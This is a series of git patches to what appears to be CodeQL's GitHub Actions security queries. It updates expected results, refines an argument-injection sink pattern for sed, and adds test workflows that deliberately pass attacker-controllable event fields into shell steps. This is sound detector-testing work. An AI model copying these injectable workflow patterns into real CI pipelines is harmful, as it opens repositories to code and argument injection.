.github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -41,6 +44,7 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index a18aa5bdc80..18ad272f803 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 124a26b1d47..41c465dcc27 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7b758b0da6d..b4a099672a4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -9,9 +9,10 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | @@ -326,6 +327,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -360,5 +362,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8d75250da74bad44e301d4a9c7553500948b5e07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:05:29 +0200 Subject: [PATCH 0396/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3d20e00ddde..79545959a7d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.16 +version: 0.1.17 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6b41b38f9a4..30ed4dc6dae 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.16 +version: 0.1.17 groups: [actions, queries] suites: codeql-suites extractor: javascript From adbb2364655e3f871e5fd04764edeaa8dd90d874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:45:49 +0200 Subject: [PATCH 0397/1267] fix(query): Better identification of argument injection commands --- ql/lib/codeql/actions/config/Config.qll | 5 ++++- ql/lib/ext/config/argument_injection_sinks.yml | 2 +- .../CWE-094/.github/workflows/arg_injection.yml | 8 ++++---- .../CWE-094/ArgumentInjectionCritical.expected | 12 +++++++++--- .../CWE-094/ArgumentInjectionMedium.expected | 8 ++++++-- 5 files changed, 24 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 1cc8ce4eb8a..8d97e63786b 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -91,5 +91,8 @@ predicate untrustedEventPropertiesDataModel(string property, string kind) { * - argument_group: capture group for the argument. */ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" + ) } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 8a9350cfebb..727c982d2ec 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,5 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: - - [".*(sed) (.*)", 1, 2] + - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index b5478a5e136..19435af16d3 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -10,10 +10,10 @@ jobs: env: TITLE: ${{github.event.issue.title}} steps: - - run: | - echo "s/FOO/$TITLE/g" - - run: | - sed "s/FOO/$TITLE/g" + - run: echo "s/FOO/$TITLE/g" + - run: sed "s/FOO/$TITLE/g" + - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 5b82e52682e..21483efe36c 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -1,8 +1,14 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 37fd97270d7..c2ff2885a99 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -1,7 +1,11 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select From 56af52a729c8a614b2cb4c3784b13622dc519110 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:46:37 +0200 Subject: [PATCH 0398/1267] feat(tests): New tests for Command Injection Injections on a workflow_run triggered protected by a allow branches list should not be reported as critical --- .../CWE-094/.github/workflows/test10.yml | 568 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 6 + .../CWE-094/CodeInjectionMedium.expected | 12 + 3 files changed, 586 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml new file mode 100644 index 00000000000..1bc02ccd826 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -0,0 +1,568 @@ +name: Self-hosted runner (push) + +on: + workflow_run: + workflows: ["Self-hosted runner (push-caller)"] + branches: ["main"] + types: [completed] + push: + branches: + - ci_* + - ci-* + paths: + - "src/**" + - "tests/**" + - ".github/**" + - "templates/**" + - "utils/**" + repository_dispatch: + +env: + HF_HOME: /mnt/cache + TRANSFORMERS_IS_CI: yes + OMP_NUM_THREADS: 8 + MKL_NUM_THREADS: 8 + PYTEST_TIMEOUT: 60 + TF_FORCE_GPU_ALLOW_GROWTH: true + RUN_PT_TF_CROSS_TESTS: 1 + CUDA_VISIBLE_DEVICES: 0,1 + +jobs: + setup: + name: Setup + strategy: + matrix: + machine_type: [single-gpu, multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + outputs: + matrix: ${{ steps.set-matrix.outputs.matrix }} + test_map: ${{ steps.set-matrix.outputs.test_map }} + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # `CI_BRANCH_PUSH`: The branch name from the push event + # `CI_BRANCH_WORKFLOW_RUN`: The name of the branch on which this workflow is triggered by `workflow_run` event + # `CI_BRANCH`: The non-empty branch name from the above two (one and only one of them is empty) + # `CI_SHA_PUSH`: The commit SHA from the push event + # `CI_SHA_WORKFLOW_RUN`: The commit SHA that triggers this workflow by `workflow_run` event + # `CI_SHA`: The non-empty commit SHA from the above two (one and only one of them is empty) + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Cleanup + working-directory: /transformers + run: | + rm -rf tests/__pycache__ + rm -rf tests/models/__pycache__ + rm -rf reports + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Fetch the tests to run + working-directory: /transformers + # TODO: add `git-python` in the docker images + run: | + pip install --upgrade git-python + python3 utils/tests_fetcher.py --diff_with_last_commit | tee test_preparation.txt + + - name: Report fetched tests + uses: actions/upload-artifact@v4 + with: + name: test_fetched + path: /transformers/test_preparation.txt + + - id: set-matrix + name: Organize tests into models + working-directory: /transformers + # The `keys` is used as GitHub actions matrix for jobs, i.e. `models/bert`, `tokenization`, `pipeline`, etc. + # The `test_map` is used to get the actual identified test files under each key. + # If no test to run (so no `test_map.json` file), create a dummy map (empty matrix will fail) + run: | + if [ -f test_map.json ]; then + keys=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); d = list(test_map.keys()); print(d)') + test_map=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); print(test_map)') + else + keys=$(python3 -c 'keys = ["dummy"]; print(keys)') + test_map=$(python3 -c 'test_map = {"dummy": []}; print(test_map)') + fi + echo $keys + echo $test_map + echo "matrix=$keys" >> $GITHUB_OUTPUT + echo "test_map=$test_map" >> $GITHUB_OUTPUT + + run_tests_single_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). + run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + 